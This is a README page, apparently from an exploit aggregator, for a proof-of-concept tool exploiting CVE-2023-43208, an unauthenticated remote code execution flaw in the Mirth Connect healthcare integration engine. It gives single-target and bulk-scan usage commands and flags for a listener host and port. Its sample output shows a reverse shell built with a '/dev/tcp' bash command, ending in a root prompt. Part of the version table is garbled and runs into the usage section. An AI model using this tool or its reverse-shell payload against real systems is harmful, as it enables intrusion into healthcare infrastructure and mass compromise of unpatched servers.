## https://sploitus.com/exploit?id=3922D9D7-A31E-594D-ACB5-7638B859E2E8
# CVE-2023-43208 โ Mirth Connect RCE



> Proof-of-Concept exploit for **CVE-2023-43208**, an unauthenticated Remote Code Execution vulnerability in **Mirth Connect** versions prior to `4.4.1`.
---
## Description
Mirth Connect is a widely deployed open-source healthcare integration engine. This vulnerability leverages a Java deserialization flaw via the `/api/users` endpoint using a crafted XML payload chaining Apache Commons Collections gadgets to achieve unauthenticated RCE.
The enhanced version replaces the original `pwncat` listener with a fully dependency-free interactive PTY shell using Python builtins only (`socket`, `select`, `tty`, `termios`). The shell is automatically upgraded to a full PTY on connection.
---
## Affected Versions
| Software | Vulnerable Versions | Fixed Version |
|----------------|---------------------|---------------|
| Mirth Connect | -lh -lp
```
### Single Target โ With ngrok / Bind Port
```bash
python3 CVE-2023-43208.py -u https:// -lh -lp -bp
```
### Bulk Scan from File
```bash
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt
```
---
## Arguments
| Flag | Description |
|-------------------|--------------------------------------------------|
| `-u`, `--url` | Target URL |
| `-lh`, `--lhost` | Your listening IP |
| `-lp`, `--lport` | Your listening port |
| `-bp`, `--bindport` | Bind port override (useful with ngrok) |
| `-f`, `--file` | File containing list of target URLs |
| `-o`, `--output` | Save vulnerable targets to file |
| `-t`, `--threads` | Number of threads for scanning (default: 50) |
---
## Example Output
```
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...
root@mirth:/#
```
---
## Disclaimer
> This tool is intended for **authorized penetration testing and educational purposes only**.
> Unauthorized use against systems you do not own or have explicit permission to test is **illegal**.
> The authors are not responsible for any misuse or damage caused by this tool.
---
## Credits
- **Coded by:** K3ysTr0K3R and Chocapikk
- **Enhanced by:** 4nuxd